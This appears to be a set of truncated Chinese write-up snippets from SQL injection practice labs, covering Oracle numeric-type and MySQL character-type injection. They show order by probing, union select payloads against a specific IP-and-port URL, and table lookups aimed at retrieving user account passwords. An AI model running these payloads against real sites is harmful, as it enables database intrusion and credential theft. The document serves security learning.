1. 判断注入点 判断注入类型为数字型 2. 用order by获取列数 2时正常,3时报错,得到列数为2 3. 联合查询获取占位符 常规联合查询报错 这是由于oracle数据库语法十分严格,在后面需要指定数据表和准确的字符类型 我们使用dual表,dual 是oracle中的一个实际存在的表,任何用户均可读取 并使用null测试字符类型 测试...
测试发现,共有两个栏目 http://219.153.49.228:43137/new_list.php?id=-1 union select '1','2' from dual -- + 判断回显 我们需要的是用户的账号密码,因此直接查找存在users字样的表名 http://219.153.49.228:43137/new_list.php?id=-1 union select (select table_name from all_tables where rownum=...
SQL手工注入漏洞测试(MySQL数据库-字符型)——漏洞记录 一进来看到一个停机公告,点开查看 发现链接中有字符参数,怀疑存在字符型注入 输入 ' and '1'='1 和 ' and '1'='2 测试是否存在注入 ' and '1'='1 ' and '1'='2 发现当输入 'and '1'='2 时,网页发生了错误,确认存在注入。 通过order ...